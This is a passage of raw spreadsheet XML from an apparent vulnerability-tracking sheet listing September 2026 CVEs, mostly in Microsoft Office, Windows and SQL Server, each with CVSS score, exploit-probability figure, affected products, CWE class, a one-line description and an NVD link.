Windows DHCP Client allows an unauthorized attacker to deny service over an adjacent network.</t></is></c><c r="T1113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69781</t></is></c></row><row r="1114"><c r="A1114" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1114" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1114" s="5" t="inlineStr"><is><t>CVE-2026-69839</t></is></c><c r="D1114" s="5" t="n"><v>6.5</v></c><c r="E1114" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1114" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1114" s="5" t="inlineStr" /><c r="H1114" s="5" t="n"><v>0.011</v></c><c r="I1114" s="5" t="inlineStr" /><c r="J1114" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1114" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1114" s="5" t="inlineStr" /><c r="M1114" s="5" t="inlineStr" /><c r="N1114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1114" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1114" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1114" s="5" t="inlineStr" /><c r="R1114" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="S1114" s="5" t="inlineStr"><is><t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t></is></c><c r="T1114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t></is></c></row><row r="1115"><c r="A1115" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1115" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1115" s="5" t="inlineStr"><is><t>CVE-2026-70019</t></is></c><c r="D1115" s="5" t="n"><v>6.5</v></c><c r="E1115" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1115" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1115" s="5" t="inlineStr" /><c r="H1115" s="5" t="n"><v>0.011</v></c><c r="I1115" s="5" t="inlineStr" /><c r="J1115" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1115" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1115" s="5" t="inlineStr" /><c r="M1115" s="5" t="inlineStr" /><c r="N1115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1115" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1115" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1115" s="5" t="inlineStr" /><c r="R1115" s="5" t="inlineStr"><is><t>CWE-65</t></is></c><c r="S1115" s="5" t="inlineStr"><is><t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t></is></c></row><row r="1116"><c r="A1116" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1116" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1116" s="5" t="inlineStr"><is><t>CVE-2026-72938</t></is></c><c r="D1116" s="5" t="n"><v>6.5</v></c><c r="E1116" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1116" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1116" s="5" t="inlineStr" /><c r="H1116" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1116" s="5" t="inlineStr" /><c r="J1116" s="5" t="inlineStr" /><c r="K1116" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1116" s="5" t="inlineStr" /><c r="M1116" s="5" t="inlineStr" /><c r="N1116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1116" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1116" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1116" s="5" t="inlineStr" /><c r="R1116" s="5" t="inlineStr"><is><t>CWE-822, CWE-843</t></is></c><c r="S1116" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72938</t></is></c></row><row r="1117"><c r="A1117" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1117" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1117" s="5" t="inlineStr"><is><t>CVE-2026-72939</t></is></c><c r="D1117" s="5" t="n"><v>6.5</v></c><c r="E1117" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1117" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1117" s="5" t="inlineStr" /><c r="H1117" s="5" t="n"><v>0.011</v></c><c r="I1117" s="5" t="inlineStr" /><c r="J1117" s="5" t="inlineStr" /><c r="K1117" s="5" t="inlineStr" /><c r="L1117" s="5" t="inlineStr" /><c r="M1117" s="5" t="inlineStr" /><c r="N1117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1117" s="5" t="inlineStr" /><c r="R1117" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1117" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to deny service over a network.</t></is></c><c r="T1117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72939</t></is></c></row><row r="1118"><c r="A1118" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1118" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1118" s="5" t="inlineStr"><is><t>CVE-2026-72942</t></is></c><c r="D1118" s="5" t="n"><v>6.5</v></c><c r="E1118" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1118" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1118" s="5" t="inlineStr" /><c r="H1118" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1118" s="5" t="inlineStr" /><c r="J1118" s="5" t="inlineStr" /><c r="K1118" s="5" t="inlineStr" /><c r="L1118" s="5" t="inlineStr" /><c r="M1118" s="5" t="inlineStr" /><c r="N1118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1118" s="5" t="inlineStr" /><c r="R1118" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1118" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72942</t></is></c></row><row r="1119"><c r="A1119" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1119" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1119" s="5" t="inlineStr"><is><t>CVE-2026-72956</t></is></c><c r="D1119" s="5" t="n"><v>6.5</v></c><c r="E1119" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1119" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1119" s="5" t="inlineStr" /><c r="H1119" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1119" s="5" t="inlineStr" /><c r="J1119" s="5" t="inlineStr" /><c r="K1119" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1119" s="5" t="inlineStr" /><c r="M1119" s="5" t="inlineStr" /><c r="N1119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1119" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1119" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1119" s="5" t="inlineStr" /><c r="R1119" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1119" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72956</t></is></c></row><row r="1120"><c r="A1120" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1120" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1120" s="5" t="inlineStr"><is><t>CVE-2026-72974</t></is></c><c r="D1120" s="5" t="n"><v>6.5</v></c><c r="E1120" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1120" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1120" s="5" t="inlineStr" /><c r="H1120" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1120" s="5" t="inlineStr" /><c r="J1120" s="5" t="inlineStr" /><c r="K1120" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1120" s="5" t="inlineStr" /><c r="M1120" s="5" t="inlineStr" /><c r="N1120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1120" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1120" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1120" s="5" t="inlineStr" /><c r="R1120" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1120" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72974</t></is></c></row><row r="1121"><c r="A1121" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1121" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1121" s="5" t="inlineStr"><is><t>CVE-2026-72975</t></is></c><c r="D1121" s="5" t="n"><v>6.5</v></c><c r="E1121" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1121" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1121" s="5" t="inlineStr" /><c r="H1121" s="5" t="n"><v>0.007</v></c><c r="I1121" s="5" t="inlineStr" /><c r="J1121" s="5" t="inlineStr" /><c r="K1121" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1121" s="5" t="inlineStr" /><c r="M1121" s="5" t="inlineStr" /><c r="N1121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1121" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1121" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1121" s="5" t="inlineStr" /><c r="R1121" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1121" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72975</t></is></c></row><row r="1122"><c r="A1122" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1122" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1122" s="5" t="inlineStr"><is><t>CVE-2026-72977</t></is></c><c r="D1122" s="5" t="n"><v>6.5</v></c><c r="E1122" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1122" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1122" s="5" t="inlineStr" /><c r="H1122" s="5" t="n"><v>0.01</v></c><c r="I1122" s="5" t="inlineStr" /><c r="J1122" s="5" t="inlineStr" /><c r="K1122" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1122" s="5" t="inlineStr" /><c r="M1122" s="5" t="inlineStr" /><c r="N1122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1122" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1122" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1122" s="5" t="inlineStr" /><c r="R1122" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1122" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72977</t></is></c></row><row r="1123"><c r="A1123" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1123" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1123" s="5" t="inlineStr"><is><t>CVE-2026-73029</t></is></c><c r="D1123" s="5" t="n"><v>6.5</v></c><c r="E1123" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1123" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1123" s="5" t="inlineStr" /><c r="H1123" s="5" t="n"><v>0.007</v></c><c r="I1123" s="5" t="inlineStr" /><c r="J1123" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1123" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1123" s="5" t="inlineStr" /><c r="M1123" s="5" t="inlineStr" /><c r="N1123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1123" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1123" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1123" s="5" t="inlineStr" /><c r="R1123" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1123" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73029</t></is></c></row><row r="1124"><c r="A1124" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1124" s="5" t="inlineStr"><is><t>CVE-2026-76000</t></is></c><c r="D1124" s="5" t="n"><v>6.5</v></c><c r="E1124" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1124" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1124" s="5" t="inlineStr" /><c r="H1124" s="5" t="n"><v>0.003</v></c><c r="I1124" s="5" t="inlineStr" /><c r="J1124" s="5" t="inlineStr" /><c r="K1124" s="5" t="inlineStr" /><c r="L1124" s="5" t="inlineStr" /><c r="M1124" s="5" t="inlineStr" /><c r="N1124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1124" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1124" s="5" t="inlineStr" /><c r="R1124" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1124" s="5" t="inlineStr"><is><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is></c><c r="T1124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76000</t></is></c></row><row r="1125"><c r="A1125" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1125" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1125" s="5" t="inlineStr"><is><t>CVE-2026-76968</t></is></c><c r="D1125" s="5" t="n"><v>6.5</v></c><c r="E1125" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1125" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1125" s="5" t="inlineStr" /><c r="H1125" s="5" t="n"><v>0.002</v></c><c r="I1125" s="5" t="inlineStr" /><c r="J1125" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1125" s="5" t="inlineStr" /><c r="L1125" s="5" t="inlineStr" /><c r="M1125" s="5" t="inlineStr" /><c r="N1125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1125" s="5" t="inlineStr" /><c r="R1125" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1125" s="5" t="inlineStr"><is><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is></c><c r="T1125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76968</t></is></c></row><row r="1126"><c r="A1126" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1126" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1126" s="5" t="inlineStr"><is><t>CVE-2026-76971</t></is></c><c r="D1126" s="5" t="n"><v>6.5</v></c><c r="E1126" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1126" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1126" s="5" t="inlineStr" /><c r="H1126" s="5" t="n"><v>0.001</v></c><c r="I1126" s="5" t="inlineStr" /><c r="J1126" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1126" s="5" t="inlineStr" /><c r="L1126" s="5" t="inlineStr" /><c r="M1126" s="5" t="inlineStr" /><c r="N1126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1126" s="5" t="inlineStr" /><c r="R1126" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1126" s="5" t="inlineStr"><is><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is></c><c r="T1126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76971</t></is></c></row><row r="1127"><c r="A1127" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1127" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1127" s="5" t="inlineStr"><is><t>CVE-2026-77896</t></is></c><c r="D1127" s="5" t="n"><v>6.5</v></c><c r="E1127" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1127" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1127" s="5" t="inlineStr" /><c r="H1127" s="5" t="n"><v>0.007</v></c><c r="I1127" s="5" t="inlineStr" /><c r="J1127" s="5" t="inlineStr" /><c r="K1127" s="5" t="inlineStr" /><c r="L1127" s="5" t="inlineStr" /><c r="M1127" s="5" t="inlineStr" /><c r="N1127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1127" s="5" t="inlineStr" /><c r="R1127" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1127" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Remote Desktop Client allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T1127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77896</t></is></c></row><row r="1128"><c r="A1128" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1128" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1128" s="5" t="inlineStr"><is><t>CVE-2026-77911</t></is></c><c r="D1128" s="5" t="n"><v>6.5</v></c><c r="E1128" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1128" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1128" s="5" t="inlineStr" /><c r="H1128" s="5" t="n"><v>0.007</v></c><c r="I1128" s="5" t="inlineStr" /><c r="J1128" s="5" t="inlineStr" /><c r="K1128" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1128" s="5" t="inlineStr" /><c r="M1128" s="5" t="inlineStr" /><c r="N1128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1128" s="5" t="inlineStr" /><c r="R1128" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1128" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77911</t></is></c></row><row r="1129"><c r="A1129" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1129" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1129" s="5" t="inlineStr"><is><t>CVE-2026-78441</t></is></c><c r="D1129" s="5" t="n"><v>6.5</v></c><c r="E1129" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1129" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1129" s="5" t="inlineStr" /><c r="H1129" s="5" t="n"><v>0.007</v></c><c r="I1129" s="5" t="inlineStr" /><c r="J1129" s="5" t="inlineStr" /><c r="K1129" s="5" t="inlineStr" /><c r="L1129" s="5" t="inlineStr" /><c r="M1129" s="5" t="inlineStr" /><c r="N1129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1129" s="5" t="inlineStr" /><c r="R1129" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1129" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows OLE DB allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78441</t></is></c></row><row r="1130"><c r="A1130" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1130" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1130" s="5" t="inlineStr"><is><t>CVE-2026-78453</t></is></c><c r="D1130" s="5" t="n"><v>6.5</v></c><c r="E1130" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1130" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1130" s="5" t="inlineStr" /><c r="H1130" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1130" s="5" t="inlineStr" /><c r="J1130" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K11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30" s="5" t="inlineStr" /><c r="M1130" s="5" t="inlineStr" /><c r="N1130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1130" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1130" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1130" s="5" t="inlineStr" /><c r="R1130" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1130" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t></is></c></row><row r="1131"><c r="A1131" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1131" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1131" s="5" t="inlineStr"><is><t>CVE-2026-78502</t></is></c><c r="D1131" s="5" t="n"><v>6.5</v></c><c r="E1131" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1131" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1131" s="5" t="inlineStr" /><c r="H1131" s="5" t="n"><v>0.007</v></c><c r="I1131" s="5" t="inlineStr" /><c r="J1131" s="5" t="inlineStr" /><c r="K1131" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1131" s="5" t="inlineStr" /><c r="M1131" s="5" t="inlineStr" /><c r="N1131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1131" s="5" t="inlineStr" /><c r="R1131" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1131" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78502</t></is></c></row><row r="1132"><c r="A1132" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1132" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1132" s="5" t="inlineStr"><is><t>CVE-2026-78503</t></is></c><c r="D1132" s="5" t="n"><v>6.5</v></c><c r="E1132" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1132" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1132" s="5" t="inlineStr" /><c r="H1132" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1132" s="5" t="inlineStr" /><c r="J1132" s="5" t="inlineStr" /><c r="K1132" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1132" s="5" t="inlineStr" /><c r="M1132" s="5" t="inlineStr" /><c r="N1132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1132" s="5" t="inlineStr" /><c r="R1132" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1132" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78503</t></is></c></row><row r="1133"><c r="A1133" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1133" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1133" s="5" t="inlineStr"><is><t>CVE-2026-78515</t></is></c><c r="D1133" s="5" t="n"><v>6.5</v></c><c r="E1133" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1133" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1133" s="5" t="inlineStr" /><c r="H1133" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1133" s="5" t="inlineStr" /><c r="J1133" s="5" t="inlineStr" /><c r="K1133" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1133" s="5" t="inlineStr" /><c r="M1133" s="5" t="inlineStr" /><c r="N1133" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1133" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1133" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1133" s="5" t="inlineStr" /><c r="R1133" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1133" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78515</t></is></c></row><row r="1134"><c r="A1134" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1134" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1134" s="5" t="inlineStr"><is><t>CVE-2026-78520</t></is></c><c r="D1134" s="5" t="n"><v>6.5</v></c><c r="E1134" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1134" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1134" s="5" t="inlineStr" /><c r="H1134" s="5" t="n"><v>0.007</v></c><c r="I1134" s="5" t="inlineStr" /><c r="J1134" s="5" t="inlineStr" /><c r="K1134" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1134" s="5" t="inlineStr" /><c r="M1134" s="5" t="inlineStr" /><c r="N1134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1134" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1134" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1134" s="5" t="inlineStr" /><c r="R1134" 